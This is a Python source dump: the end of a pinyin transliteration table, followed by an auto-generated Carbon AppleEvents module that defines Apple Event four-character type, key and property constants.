'Chao ', # 0xd8
'Ji ', # 0xd9
'Gu ', # 0xda
'Dan ', # 0xdb
'Zui ', # 0xdc
'Di ', # 0xdd
'Shang ', # 0xde
'Hua ', # 0xdf
'Quan ', # 0xe0
'Ge ', # 0xe1
'Chi ', # 0xe2
'Jie ', # 0xe3
'Gui ', # 0xe4
'Gong ', # 0xe5
'Hong ', # 0xe6
'Jie ', # 0xe7
'Hun ', # 0xe8
'Qiu ', # 0xe9
'Xing ', # 0xea
'Su ', # 0xeb
'Ni ', # 0xec
'Ji ', # 0xed
'Lu ', # 0xee
'Zhi ', # 0xef
'Zha ', # 0xf0
'Bi ', # 0xf1
'Xing ', # 0xf2
'Hu ', # 0xf3
'Shang ', # 0xf4
'Gong ', # 0xf5
'Zhi ', # 0xf6
'Xue ', # 0xf7
'Chu ', # 0xf8
'Xi ', # 0xf9
'Yi ', # 0xfa
'Lu ', # 0xfb
'Jue ', # 0xfc
'Xi ', # 0xfd
'Yan ', # 0xfe
'Xi ', # 0xff
)
|
tinkerinestudio/Tinkerine-Suite | refs/heads/master | TinkerineSuite/pypy/lib-python/2.7/plat-mac/Carbon/AppleEvents.py | 73 | # Generated from 'AEDataModel.h'
def FOUR_CHAR_CODE(x): return x
typeApplicationBundleID = FOUR_CHAR_CODE('bund')
typeBoolean = FOUR_CHAR_CODE('bool')
typeChar = FOUR_CHAR_CODE('TEXT')
typeSInt16 = FOUR_CHAR_CODE('shor')
typeSInt32 = FOUR_CHAR_CODE('long')
typeUInt32 = FOUR_CHAR_CODE('magn')
typeSInt64 = FOUR_CHAR_CODE('comp')
typeIEEE32BitFloatingPoint = FOUR_CHAR_CODE('sing')
typeIEEE64BitFloatingPoint = FOUR_CHAR_CODE('doub')
type128BitFloatingPoint = FOUR_CHAR_CODE('ldbl')
typeDecimalStruct = FOUR_CHAR_CODE('decm')
typeSMInt = typeSInt16
typeShortInteger = typeSInt16
typeInteger = typeSInt32
typeLongInteger = typeSInt32
typeMagnitude = typeUInt32
typeComp = typeSInt64
typeSMFloat = typeIEEE32BitFloatingPoint
typeShortFloat = typeIEEE32BitFloatingPoint
typeFloat = typeIEEE64BitFloatingPoint
typeLongFloat = typeIEEE64BitFloatingPoint
typeExtended = FOUR_CHAR_CODE('exte')
typeAEList = FOUR_CHAR_CODE('list')
typeAERecord = FOUR_CHAR_CODE('reco')
typeAppleEvent = FOUR_CHAR_CODE('aevt')
typeEventRecord = FOUR_CHAR_CODE('evrc')
typeTrue = FOUR_CHAR_CODE('true')
typeFalse = FOUR_CHAR_CODE('fals')
typeAlias = FOUR_CHAR_CODE('alis')
typeEnumerated = FOUR_CHAR_CODE('enum')
typeType = FOUR_CHAR_CODE('type')
typeAppParameters = FOUR_CHAR_CODE('appa')
typeProperty = FOUR_CHAR_CODE('prop')
typeFSS = FOUR_CHAR_CODE('fss ')
typeFSRef = FOUR_CHAR_CODE('fsrf')
typeFileURL = FOUR_CHAR_CODE('furl')
typeKeyword = FOUR_CHAR_CODE('keyw')
typeSectionH = FOUR_CHAR_CODE('sect')
typeWildCard = FOUR_CHAR_CODE('****')
typeApplSignature = FOUR_CHAR_CODE('sign')
typeQDRectangle = FOUR_CHAR_CODE('qdrt')
typeFixed = FOUR_CHAR_CODE('fixd')
typeProcessSerialNumber = FOUR_CHAR_CODE('psn ')
typeApplicationURL = FOUR_CHAR_CODE('aprl')
typeNull = FOUR_CHAR_CODE('null')
typeSessionID = FOUR_CHAR_CODE('ssid')
typeTargetID = FOUR_CHAR_CODE('targ')
typeDispatcherID = FOUR_CHAR_CODE('dspt')
keyTransactionIDAttr = FOUR_CHAR_CODE('tran')
keyReturnIDAttr = FOUR_CHAR_CODE('rtid')
keyEventClassAttr = FOUR_CHAR_CODE('evcl')
keyEventIDAttr = FOUR_CHAR_CODE('evid')
keyAddressAttr = FOUR_CHAR_CODE('addr')
keyOptionalKeywordAttr = FOUR_CHAR_CODE('optk')
keyTimeoutAttr = FOUR_CHAR_CODE('timo')
keyInteractLevelAttr = FOUR_CHAR_CODE('inte')
keyEventSourceAttr = FOUR_CHAR_CODE('esrc')
keyMissedKeywordAttr = FOUR_CHAR_CODE('miss')
keyOriginalAddressAttr = FOUR_CHAR_CODE('from')
keyAcceptTimeoutAttr = FOUR_CHAR_CODE('actm')
kAEDescListFactorNone = 0
kAEDescListFactorType = 4
kAEDescListFactorTypeAndSize = 8
kAutoGenerateReturnID = -1
kAnyTransactionID = 0
kAEDataArray = 0
kAEPackedArray = 1
kAEDescArray = 3
kAEKeyDescArray = 4
kAEHandleArray = 2
kAENormalPriority = 0x00000000
kAEHighPriority = 0x00000001
kAENoReply = 0x00000001
kAEQueueReply = 0x00000002
kAEWaitReply = 0x00000003
kAEDontReconnect = 0x00000080
kAEWantReceipt = 0x00000200
kAENeverInteract = 0x00000010
kAECanInteract = 0x00000020
kAEAlwaysInteract = 0x00000030
kAECanSwitchLayer = 0x00000040
kAEDontRecord = 0x00001000
kAEDontExecute = 0x00002000
kAEProcessNonReplyEvents = 0x00008000
kAEDefaultTimeout = -1
kNoTimeOut = -2
kAEInteractWithSelf = 0
kAEInteractWithLocal = 1
kAEInteractWithAll = 2
kAEDoNotIgnoreHandler = 0x00000000
kAEIgnoreAppPhacHandler = 0x00000001
kAEIgnoreAppEventHandler = 0x00000002
kAEIgnoreSysPhacHandler = 0x00000004
kAEIgnoreSysEventHandler = 0x00000008
kAEIngoreBuiltInEventHandler = 0x00000010
# kAEDontDisposeOnResume = (long)0x80000000
kAENoDispatch = 0
# kAEUseStandardDispatch = (long)0xFFFFFFFF
keyDirectObject = FOUR_CHAR_CODE('----')
keyErrorNumber = FOUR_CHAR_CODE('errn')
keyErrorString = FOUR_CHAR_CODE('errs')
keyProcessSerialNumber = FOUR_CHAR_CODE('psn ')
keyPreDispatch = FOUR_CHAR_CODE('phac')
keySelectProc = FOUR_CHAR_CODE('selh')
keyAERecorderCount = FOUR_CHAR_CODE('recr')
keyAEVersion = FOUR_CHAR_CODE('vers')
kCoreEventClass = FOUR_CHAR_CODE('aevt')
kAEOpenApplication = FOUR_CHAR_CODE('oapp')
kAEOpenDocuments = FOUR_CHAR_CODE('odoc')
kAEPrintDocuments = FOUR_CHAR_CODE('pdoc')
kAEQuitApplication = FOUR_CHAR_CODE('quit')
kAEAnswer = FOUR_CHAR_CODE('ansr')
kAEApplicationDied = FOUR_CHAR_CODE('obit')
kAEShowPreferences = FOUR_CHAR_CODE('pref')
kAEStartRecording = FOUR_CHAR_CODE('reca')
kAEStopRecording = FOUR_CHAR_CODE('recc')
kAENotifyStartRecording = FOUR_CHAR_CODE('rec1')
kAENotifyStopRecording = FOUR_CHAR_CODE('rec0')
kAENotifyRecording = FOUR_CHAR_CODE('recr')
kAEUnknownSource = 0
kAEDirectCall = 1
kAESameProcess = 2
kAELocalProcess = 3
kAERemoteProcess = 4
cAEList = FOUR_CHAR_CODE('list')
cApplication = FOUR_CHAR_CODE('capp')
cArc = FOUR_CHAR_CODE('carc')
cBoolean = FOUR_CHAR_CODE('bool')
cCell = FOUR_CHAR_CODE('ccel')
cChar = FOUR_CHAR_CODE('cha ')
cColorTable = FOUR_CHAR_CODE('clrt')
cColumn = FOUR_CHAR_CODE('ccol')
cDocument = FOUR_CHAR_CODE('docu')
cDrawingArea = FOUR_CHAR_CODE('cdrw')
cEnumeration = FOUR_CHAR_CODE('enum')
cFile = FOUR_CHAR_CODE('file')
cFixed = FOUR_CHAR_CODE('fixd')
cFixedPoint = FOUR_CHAR_CODE('fpnt')
cFixedRectangle = FOUR_CHAR_CODE('frct')
cGraphicLine = FOUR_CHAR_CODE('glin')
cGraphicObject = FOUR_CHAR_CODE('cgob')
cGraphicShape = FOUR_CHAR_CODE('cgsh')
cGraphicText = FOUR_CHAR_CODE('cgtx')
cGroupedGraphic = FOUR_CHAR_CODE('cpic')
cInsertionLoc = FOUR_CHAR_CODE('insl')
cInsertionPoint = FOUR_CHAR_CODE('cins')
cIntlText = FOUR_CHAR_CODE('itxt')
cIntlWritingCode = FOUR_CHAR_CODE('intl')
cItem = FOUR_CHAR_CODE('citm')
cLine = FOUR_CHAR_CODE('clin')
cLongDateTime = FOUR_CHAR_CODE('ldt ')
cLongFixed = FOUR_CHAR_CODE('lfxd')
cLongFixedPoint = FOUR_CHAR_CODE('lfpt')
cLongFixedRectangle = FOUR_CHAR_CODE('lfrc')
cLongInteger = FOUR_CHAR_CODE('long')
cLongPoint = FOUR_CHAR_CODE('lpnt')
cLongRectangle = FOUR_CHAR_CODE('lrct')
cMachineLoc = FOUR_CHAR_CODE('mLoc')
cMenu = FOUR_CHAR_CODE('cmnu')
cMenuItem = FOUR_CHAR_CODE('cmen')
cObject = FOUR_CHAR_CODE('cobj')
cObjectSpecifier = FOUR_CHAR_CODE('obj ')
cOpenableObject = FOUR_CHAR_CODE('coob')
cOval = FOUR_CHAR_CODE('covl')
cParagraph = FOUR_CHAR_CODE('cpar')
cPICT = FOUR_CHAR_CODE('PICT')
cPixel = FOUR_CHAR_CODE('cpxl')
cPixelMap = FOUR_CHAR_CODE('cpix')
cPolygon = FOUR_CHAR_CODE('cpgn')
cProperty = FOUR_CHAR_CODE('prop')
cQDPoint = FOUR_CHAR_CODE('QDpt')
cQDRectangle = FOUR_CHAR_CODE('qdrt')
cRectangle = FOUR_CHAR_CODE('crec')
cRGBColor = FOUR_CHAR_CODE('cRGB')
cRotation = FOUR_CHAR_CODE('trot')
cRoundedRectangle = FOUR_CHAR_CODE('crrc')
cRow = FOUR_CHAR_CODE('crow')
cSelection = FOUR_CHAR_CODE('csel')
cShortInteger = FOUR_CHAR_CODE('shor')
cTable = FOUR_CHAR_CODE('ctbl')
cText = FOUR_CHAR_CODE('ctxt')
cTextFlow = FOUR_CHAR_CODE('cflo')
cTextStyles = FOUR_CHAR_CODE('tsty')
cType = FOUR_CHAR_CODE('type')
cVersion = FOUR_CHAR_CODE('vers')
cWindow = FOUR_CHAR_CODE('cwin')
cWord = FOUR_CHAR_CODE('cwor')
enumArrows = FOUR_CHAR_CODE('arro')
enumJustification = FOUR_CHAR_CODE('just')
enumKeyForm = FOUR_CHAR_CODE('kfrm')
enumPosition = FOUR_CHAR_CODE('posi')
enumProtection = FOUR_CHAR_CODE('prtn')
enumQuality = FOUR_CHAR_CODE('qual')
enumSaveOptions = FOUR_CHAR_CODE('savo')
enumStyle = FOUR_CHAR_CODE('styl')
enumTransferMode = FOUR_CHAR_CODE('tran')
formUniqueID = FOUR_CHAR_CODE('ID ')
kAEAbout = FOUR_CHAR_CODE('abou')
kAEAfter = FOUR_CHAR_CODE('afte')
kAEAliasSelection = FOUR_CHAR_CODE('sali')
kAEAllCaps = FOUR_CHAR_CODE('alcp')
kAEArrowAtEnd = FOUR_CHAR_CODE('aren')
kAEArrowAtStart = FOUR_CHAR_CODE('arst')
kAEArrowBothEnds = FOUR_CHAR_CODE('arbo')
kAEAsk = FOUR_CHAR_CODE('ask ')
kAEBefore = FOUR_CHAR_CODE('befo')
kAEBeginning = FOUR_CHAR_CODE('bgng')
kAEBeginsWith = FOUR_CHAR_CODE('bgwt')
kAEBeginTransaction = FOUR_CHAR_CODE('begi')
kAEBold = FOUR_CHAR_CODE('bold')
kAECaseSensEquals = FOUR_CHAR_CODE('cseq')
kAECentered = FOUR_CHAR_CODE('cent')
kAEChangeView = FOUR_CHAR_CODE('view')
kAEClone = FOUR_CHAR_CODE('clon')
kAEClose = FOUR_CHAR_CODE('clos')
kAECondensed = FOUR_CHAR_CODE('cond')
kAEContains = FOUR_CHAR_CODE('cont')
kAECopy = FOUR_CHAR_CODE('copy')
kAECoreSuite = FOUR_CHAR_CODE('core')
kAECountElements = FOUR_CHAR_CODE('cnte')
kAECreateElement = FOUR_CHAR_CODE('crel')
kAECreatePublisher = FOUR_CHAR_CODE('cpub')
kAECut = FOUR_CHAR_CODE('cut ')
kAEDelete = FOUR_CHAR_CODE('delo')
kAEDoObjectsExist = FOUR_CHAR_CODE('doex')
kAEDoScript = FOUR_CHAR_CODE('dosc')
kAEDrag = FOUR_CHAR_CODE('drag')
kAEDuplicateSelection = FOUR_CHAR_CODE('sdup')
kAEEditGraphic = FOUR_CHAR_CODE('edit')
kAEEmptyTrash = FOUR_CHAR_CODE('empt')
kAEEnd = FOUR_CHAR_CODE('end ')
kAEEndsWith = FOUR_CHAR_CODE('ends')
kAEEndTransaction = FOUR_CHAR_CODE('endt')
kAEEquals = FOUR_CHAR_CODE('= ')
kAEExpanded = FOUR_CHAR_CODE('pexp')
kAEFast = FOUR_CHAR_CODE('fast')
kAEFinderEvents = FOUR_CHAR_CODE('FNDR')
kAEFormulaProtect = FOUR_CHAR_CODE('fpro')
kAEFullyJustified = FOUR_CHAR_CODE('full')
kAEGetClassInfo = FOUR_CHAR_CODE('qobj')
kAEGetData = FOUR_CHAR_CODE('getd')
kAEGetDataSize = FOUR_CHAR_CODE('dsiz')
kAEGetEventInfo = FOUR_CHAR_CODE('gtei')
kAEGetInfoSelection = FOUR_CHAR_CODE('sinf')
kAEGetPrivilegeSelection = FOUR_CHAR_CODE('sprv')
kAEGetSuiteInfo = FOUR_CHAR_CODE('gtsi')
kAEGreaterThan = FOUR_CHAR_CODE('> ')
kAEGreaterThanEquals = FOUR_CHAR_CODE('>= ')
kAEGrow = FOUR_CHAR_CODE('grow')
kAEHidden = FOUR_CHAR_CODE('hidn')
kAEHiQuality = FOUR_CHAR_CODE('hiqu')
kAEImageGraphic = FOUR_CHAR_CODE('imgr')
kAEIsUniform = FOUR_CHAR_CODE('isun')
kAEItalic = FOUR_CHAR_CODE('ital')
kAELeftJustified = FOUR_CHAR_CODE('left')
kAELessThan = FOUR_CHAR_CODE('< ')
kAELessThanEquals = FOUR_CHAR_CODE('<= ')
kAELowercase = FOUR_CHAR_CODE('lowc')
kAEMakeObjectsVisible = FOUR_CHAR_CODE('mvis')
kAEMiscStandards = FOUR_CHAR_CODE('misc')
kAEModifiable = FOUR_CHAR_CODE('modf')
kAEMove = FOUR_CHAR_CODE('move')
kAENo = FOUR_CHAR_CODE('no ')
kAENoArrow = FOUR_CHAR_CODE('arno')
kAENonmodifiable = FOUR_CHAR_CODE('nmod')
kAEOpen = FOUR_CHAR_CODE('odoc')
kAEOpenSelection = FOUR_CHAR_CODE('sope')
kAEOutline = FOUR_CHAR_CODE('outl')
kAEPageSetup = FOUR_CHAR_CODE('pgsu')
kAEPaste = FOUR_CHAR_CODE('past')
kAEPlain = FOUR_CHAR_CODE('plan')
kAEPrint = FOUR_CHAR_CODE('pdoc')
kAEPrintSelection = FOUR_CHAR_CODE('spri')
kAEPrintWindow = FOUR_CHAR_CODE('pwin')
kAEPutAwaySelection = FOUR_CHAR_CODE('sput')
kAEQDAddOver = FOUR_CHAR_CODE('addo')
kAEQDAddPin = FOUR_CHAR_CODE('addp')
kAEQDAdMax = FOUR_CHAR_CODE('admx')
kAEQDAdMin = FOUR_CHAR_CODE('admn')
kAEQDBic = FOUR_CHAR_CODE('bic ')
kAEQDBlend = FOUR_CHAR_CODE('blnd')
kAEQDCopy = FOUR_CHAR_CODE('cpy ')
kAEQDNotBic = FOUR_CHAR_CODE('nbic')
kAEQDNotCopy = FOUR_CHAR_CODE('ncpy')
kAEQDNotOr = FOUR_CHAR_CODE('ntor')
kAEQDNotXor = FOUR_CHAR_CODE('nxor')
kAEQDOr = FOUR_CHAR_CODE('or ')
kAEQDSubOver = FOUR_CHAR_CODE('subo')
kAEQDSubPin = FOUR_CHAR_CODE('subp')
kAEQDSupplementalSuite = FOUR_CHAR_CODE('qdsp')
kAEQDXor = FOUR_CHAR_CODE('xor ')
kAEQuickdrawSuite = FOUR_CHAR_CODE('qdrw')
kAEQuitAll = FOUR_CHAR_CODE('quia')
kAERedo = FOUR_CHAR_CODE('redo')
kAERegular = FOUR_CHAR_CODE('regl')
kAEReopenApplication = FOUR_CHAR_CODE('rapp')
kAEReplace = FOUR_CHAR_CODE('rplc')
kAERequiredSuite = FOUR_CHAR_CODE('reqd')
kAERestart = FOUR_CHAR_CODE('rest')
kAERevealSelection = FOUR_CHAR_CODE('srev')
kAERevert = FOUR_CHAR_CODE('rvrt')
kAERightJustified = FOUR_CHAR_CODE('rght')
kAESave = FOUR_CHAR_CODE('save')
kAESelect = FOUR_CHAR_CODE('slct')
kAESetData = FOUR_CHAR_CODE('setd')
kAESetPosition = FOUR_CHAR_CODE('posn')
kAEShadow = FOUR_CHAR_CODE('shad')
kAEShowClipboard = FOUR_CHAR_CODE('shcl')
kAEShutDown = FOUR_CHAR_CODE('shut')
kAESleep = FOUR_CHAR_CODE('slep')
kAESmallCaps = FOUR_CHAR_CODE('smcp')
kAESpecialClassProperties = FOUR_CHAR_CODE('c@#!')
kAEStrikethrough = FOUR_CHAR_CODE('strk')
kAESubscript = FOUR_CHAR_CODE('sbsc')
kAESuperscript = FOUR_CHAR_CODE('spsc')
kAETableSuite = FOUR_CHAR_CODE('tbls')
kAETextSuite = FOUR_CHAR_CODE('TEXT')
kAETransactionTerminated = FOUR_CHAR_CODE('ttrm')
kAEUnderline = FOUR_CHAR_CODE('undl')
kAEUndo = FOUR_CHAR_CODE('undo')
kAEWholeWordEquals = FOUR_CHAR_CODE('wweq')
kAEYes = FOUR_CHAR_CODE('yes ')
kAEZoom = FOUR_CHAR_CODE('zoom')
kAEMouseClass = FOUR_CHAR_CODE('mous')
kAEDown = FOUR_CHAR_CODE('down')
kAEUp = FOUR_CHAR_CODE('up ')
kAEMoved = FOUR_CHAR_CODE('move')
kAEStoppedMoving = FOUR_CHAR_CODE('stop')
kAEWindowClass = FOUR_CHAR_CODE('wind')
kAEUpdate = FOUR_CHAR_CODE('updt')
kAEActivate = FOUR_CHAR_CODE('actv')
kAEDeactivate = FOUR_CHAR_CODE('dact')
kAECommandClass = FOUR_CHAR_CODE('cmnd')
kAEKeyClass = FOUR_CHAR_CODE('keyc')
kAERawKey = FOUR_CHAR_CODE('rkey')
kAEVirtualKey = FOUR_CHAR_CODE('keyc')
kAENavigationKey = FOUR_CHAR_CODE('nave')
kAEAutoDown = FOUR_CHAR_CODE('auto')
kAEApplicationClass = FOUR_CHAR_CODE('appl')
kAESuspend = FOUR_CHAR_CODE('susp')
kAEResume = FOUR_CHAR_CODE('rsme')
kAEDiskEvent = FOUR_CHAR_CODE('disk')
kAENullEvent = FOUR_CHAR_CODE('null')
kAEWakeUpEvent = FOUR_CHAR_CODE('wake')
kAEScrapEvent = FOUR_CHAR_CODE('scrp')
kAEHighLevel = FOUR_CHAR_CODE('high')
keyAEAngle = FOUR_CHAR_CODE('kang')
keyAEArcAngle = FOUR_CHAR_CODE('parc')
keyAEBaseAddr = FOUR_CHAR_CODE('badd')
keyAEBestType = FOUR_CHAR_CODE('pbst')
keyAEBgndColor = FOUR_CHAR_CODE('kbcl')
keyAEBgndPattern = FOUR_CHAR_CODE('kbpt')
keyAEBounds = FOUR_CHAR_CODE('pbnd')
keyAECellList = FOUR_CHAR_CODE('kclt')
keyAEClassID = FOUR_CHAR_CODE('clID')
keyAEColor = FOUR_CHAR_CODE('colr')
keyAEColorTable = FOUR_CHAR_CODE('cltb')
keyAECurveHeight = FOUR_CHAR_CODE('kchd')
keyAECurveWidth = FOUR_CHAR_CODE('kcwd')
keyAEDashStyle = FOUR_CHAR_CODE('pdst')
keyAEData = FOUR_CHAR_CODE('data')
keyAEDefaultType = FOUR_CHAR_CODE('deft')
keyAEDefinitionRect = FOUR_CHAR_CODE('pdrt')
keyAEDescType = FOUR_CHAR_CODE('dstp')
keyAEDestination = FOUR_CHAR_CODE('dest')
keyAEDoAntiAlias = FOUR_CHAR_CODE('anta')
keyAEDoDithered = FOUR_CHAR_CODE('gdit')
keyAEDoRotate = FOUR_CHAR_CODE('kdrt')
keyAEDoScale = FOUR_CHAR_CODE('ksca')
keyAEDoTranslate = FOUR_CHAR_CODE('ktra')
keyAEEditionFileLoc = FOUR_CHAR_CODE('eloc')
keyAEElements = FOUR_CHAR_CODE('elms')
keyAEEndPoint = FOUR_CHAR_CODE('pend')
keyAEEventClass = FOUR_CHAR_CODE('evcl')
keyAEEventID = FOUR_CHAR_CODE('evti')
keyAEFile = FOUR_CHAR_CODE('kfil')
keyAEFileType = FOUR_CHAR_CODE('fltp')
keyAEFillColor = FOUR_CHAR_CODE('flcl')
keyAEFillPattern = FOUR_CHAR_CODE('flpt')
keyAEFlipHorizontal = FOUR_CHAR_CODE('kfho')
keyAEFlipVertical = FOUR_CHAR_CODE('kfvt')
keyAEFont = FOUR_CHAR_CODE('font')
keyAEFormula = FOUR_CHAR_CODE('pfor')
keyAEGraphicObjects = FOUR_CHAR_CODE('gobs')
keyAEID = FOUR_CHAR_CODE('ID ')
keyAEImageQuality = FOUR_CHAR_CODE('gqua')
keyAEInsertHere = FOUR_CHAR_CODE('insh')
keyAEKeyForms = FOUR_CHAR_CODE('keyf')
keyAEKeyword = FOUR_CHAR_CODE('kywd')
keyAELevel = FOUR_CHAR_CODE('levl')
keyAELineArrow = FOUR_CHAR_CODE('arro')
keyAEName = FOUR_CHAR_CODE('pnam')
keyAENewElementLoc = FOUR_CHAR_CODE('pnel')
keyAEObject = FOUR_CHAR_CODE('kobj')
keyAEObjectClass = FOUR_CHAR_CODE('kocl')
keyAEOffStyles = FOUR_CHAR_CODE('ofst')
keyAEOnStyles = FOUR_CHAR_CODE('onst')
keyAEParameters = FOUR_CHAR_CODE('prms')
keyAEParamFlags = FOUR_CHAR_CODE('pmfg')
keyAEPenColor = FOUR_CHAR_CODE('ppcl')
keyAEPenPattern = FOUR_CHAR_CODE('pppa')
keyAEPenWidth = FOUR_CHAR_CODE('ppwd')
keyAEPixelDepth = FOUR_CHAR_CODE('pdpt')
keyAEPixMapMinus = FOUR_CHAR_CODE('kpmm')
keyAEPMTable = FOUR_CHAR_CODE('kpmt')
keyAEPointList = FOUR_CHAR_CODE('ptlt')
keyAEPointSize = FOUR_CHAR_CODE('ptsz')
keyAEPosition = FOUR_CHAR_CODE('kpos')
keyAEPropData = FOUR_CHAR_CODE('prdt')
keyAEProperties = FOUR_CHAR_CODE('qpro')
keyAEProperty = FOUR_CHAR_CODE('kprp')
keyAEPropFlags = FOUR_CHAR_CODE('prfg')
keyAEPropID = FOUR_CHAR_CODE('prop')
keyAEProtection = FOUR_CHAR_CODE('ppro')
keyAERenderAs = FOUR_CHAR_CODE('kren')
keyAERequestedType = FOUR_CHAR_CODE('rtyp')
keyAEResult = FOUR_CHAR_CODE('----')
keyAEResultInfo = FOUR_CHAR_CODE('rsin')
keyAERotation = FOUR_CHAR_CODE('prot')
keyAERotPoint = FOUR_CHAR_CODE('krtp')
keyAERowList = FOUR_CHAR_CODE('krls')
keyAESaveOptions = FOUR_CHAR_CODE('savo')
keyAEScale = FOUR_CHAR_CODE('pscl')
keyAEScriptTag = FOUR_CHAR_CODE('psct')
keyAEShowWhere = FOUR_CHAR_CODE('show')
keyAEStartAngle = FOUR_CHAR_CODE('pang')
keyAEStartPoint = FOUR_CHAR_CODE('pstp')
keyAEStyles = FOUR_CHAR_CODE('ksty')
keyAESuiteID = FOUR_CHAR_CODE('suit')
keyAEText = FOUR_CHAR_CODE('ktxt')
keyAETextColor = FOUR_CHAR_CODE('ptxc')
keyAETextFont = FOUR_CHAR_CODE('ptxf')
keyAETextPointSize = FOUR_CHAR_CODE('ptps')
keyAETextStyles = FOUR_CHAR_CODE('txst')
keyAETextLineHeight = FOUR_CHAR_CODE('ktlh')
keyAETextLineAscent = FOUR_CHAR_CODE('ktas')
keyAETheText = FOUR_CHAR_CODE('thtx')
keyAETransferMode = FOUR_CHAR_CODE('pptm')
keyAETranslation = FOUR_CHAR_CODE('ptrs')
keyAETryAsStructGraf = FOUR_CHAR_CODE('toog')
keyAEUniformStyles = FOUR_CHAR_CODE('ustl')
keyAEUpdateOn = FOUR_CHAR_CODE('pupd')
keyAEUserTerm = FOUR_CHAR_CODE('utrm')
keyAEWindow = FOUR_CHAR_CODE('wndw')
keyAEWritingCode = FOUR_CHAR_CODE('wrcd')
keyMiscellaneous = FOUR_CHAR_CODE('fmsc')
keySelection = FOUR_CHAR_CODE('fsel')
keyWindow = FOUR_CHAR_CODE('kwnd')
keyWhen = FOUR_CHAR_CODE('when')
keyWhere = FOUR_CHAR_CODE('wher')
keyModifiers = FOUR_CHAR_CODE('mods')
keyKey = FOUR_CHAR_CODE('key ')
keyKeyCode = FOUR_CHAR_CODE('code')
keyKeyboard = FOUR_CHAR_CODE('keyb')
keyDriveNumber = FOUR_CHAR_CODE('drv#')
keyErrorCode = FOUR_CHAR_CODE('err#')
keyHighLevelClass = FOUR_CHAR_CODE('hcls')
keyHighLevelID = FOUR_CHAR_CODE('hid ')
pArcAngle = FOUR_CHAR_CODE('parc')
pBackgroundColor = FOUR_CHAR_CODE('pbcl')
pBackgroundPattern = FOUR_CHAR_CODE('pbpt')
pBestType = FOUR_CHAR_CODE('pbst')
pBounds = FOUR_CHAR_CODE('pbnd')
pClass = FOUR_CHAR_CODE('pcls')
pClipboard = FOUR_CHAR_CODE('pcli')
pColor = FOUR_CHAR_CODE('colr')
pColorTable = FOUR_CHAR_CODE('cltb')
pContents = FOUR_CHAR_CODE('pcnt')
pCornerCurveHeight = FOUR_CHAR_CODE('pchd')
pCornerCurveWidth = FOUR_CHAR_CODE('pcwd')
pDashStyle = FOUR_CHAR_CODE('pdst')
pDefaultType = FOUR_CHAR_CODE('deft')
pDefinitionRect = FOUR_CHAR_CODE('pdrt')
pEnabled = FOUR_CHAR_CODE('enbl')
pEndPoint = FOUR_CHAR_CODE('pend')
pFillColor = FOUR_CHAR_CODE('flcl')
pFillPattern = FOUR_CHAR_CODE('flpt')
pFont = FOUR_CHAR_CODE('font')
pFormula = FOUR_CHAR_CODE('pfor')
pGraphicObjects = FOUR_CHAR_CODE('gobs')
pHasCloseBox = FOUR_CHAR_CODE('hclb')
pHasTitleBar = FOUR_CHAR_CODE('ptit')
pID = FOUR_CHAR_CODE('ID ')
pIndex = FOUR_CHAR_CODE('pidx')
pInsertionLoc = FOUR_CHAR_CODE('pins')
pIsFloating = FOUR_CHAR_CODE('isfl')
pIsFrontProcess = FOUR_CHAR_CODE('pisf')
pIsModal = FOUR_CHAR_CODE('pmod')
pIsModified = FOUR_CHAR_CODE('imod')
pIsResizable = FOUR_CHAR_CODE('prsz')
pIsStationeryPad = FOUR_CHAR_CODE('pspd')
pIsZoomable = FOUR_CHAR_CODE('iszm')
pIsZoomed = FOUR_CHAR_CODE('pzum')
pItemNumber = FOUR_CHAR_CODE('itmn')
pJustification = FOUR_CHAR_CODE('pjst')
pLineArrow = FOUR_CHAR_CODE('arro')
pMenuID = FOUR_CHAR_CODE('mnid')
pName = FOUR_CHAR_CODE('pnam')
pNewElementLoc = FOUR_CHAR_CODE('pnel')
pPenColor = FOUR_CHAR_CODE('ppcl')
pPenPattern = FOUR_CHAR_CODE('pppa')
pPenWidth = FOUR_CHAR_CODE('ppwd')
pPixelDepth = FOUR_CHAR_CODE('pdpt')
pPointList = FOUR_CHAR_CODE('ptlt')
pPointSize = FOUR_CHAR_CODE('ptsz')
pProtection = FOUR_CHAR_CODE('ppro')
pRotation = FOUR_CHAR_CODE('prot')
pScale = FOUR_CHAR_CODE('pscl')
pScript = FOUR_CHAR_CODE('scpt')
pScriptTag = FOUR_CHAR_CODE('psct')
pSelected = FOUR_CHAR_CODE('selc')
pSelection = FOUR_CHAR_CODE('sele')
pStartAngle = FOUR_CHAR_CODE('pang')
pStartPoint = FOUR_CHAR_CODE('pstp')
pTextColor = FOUR_CHAR_CODE('ptxc')
pTextFont = FOUR_CHAR_CODE('ptxf')
pTextItemDelimiters = FOUR_CHAR_CODE('txdl')
pTextPointSize = FOUR_CHAR_CODE('ptps')
pTextStyles = FOUR_CHAR_CODE('txst')
pTransferMode = FOUR_CHAR_CODE('pptm')
pTranslation = FOUR_CHAR_CODE('ptrs')
pUniformStyles = FOUR_CHAR_CODE('ustl')
pUpdateOn = FOUR_CHAR_CODE('pupd')
pUserSelection = FOUR_CHAR_CODE('pusl')
pVersion = FOUR_CHAR_CODE('vers')
pVisible = FOUR_CHAR_CODE('pvis')
typeAEText = FOUR_CHAR_CODE('tTXT')
typeArc = FOUR_CHAR_CODE('carc')
typeBest = FOUR_CHAR_CODE('best')
typeCell = FOUR_CHAR_CODE('ccel')
typeClassInfo = FOUR_CHAR_CODE('gcli')
typeColorTable = FOUR_CHAR_CODE('clrt')
typeColumn = FOUR_CHAR_CODE('ccol')
typeDashStyle = FOUR_CHAR_CODE('tdas')
typeData = FOUR_CHAR_CODE('tdta')
typeDrawingArea = FOUR_CHAR_CODE('cdrw')
typeElemInfo = FOUR_CHAR_CODE('elin')
typeEnumeration = FOUR_CHAR_CODE('enum')
typeEPS = FOUR_CHAR_CODE('EPS ')
typeEventInfo = FOUR_CHAR_CODE('evin')
typeFinderWindow = FOUR_CHAR_CODE('fwin')
typeFixedPoint = FOUR_CHAR_CODE('fpnt')
typeFixedRectangle = FOUR_CHAR_CODE('frct')
typeGraphicLine = FOUR_CHAR_CODE('glin')
typeGraphicText = FOUR_CHAR_CODE('cgtx')
typeGroupedGraphic = FOUR_CHAR_CODE('cpic')
typeInsertionLoc = FOUR_CHAR_CODE('insl')
typeIntlText = FOUR_CHAR_CODE('itxt')
typeIntlWritingCode = FOUR_CHAR_CODE('intl')
typeLongDateTime = FOUR_CHAR_CODE('ldt ')
typeLongFixed = FOUR_CHAR_CODE('lfxd')
typeLongFixedPoint = FOUR_CHAR_CODE('lfpt')
typeLongFixedRectangle = FOUR_CHAR_CODE('lfrc')
typeLongPoint = FOUR_CHAR_CODE('lpnt')
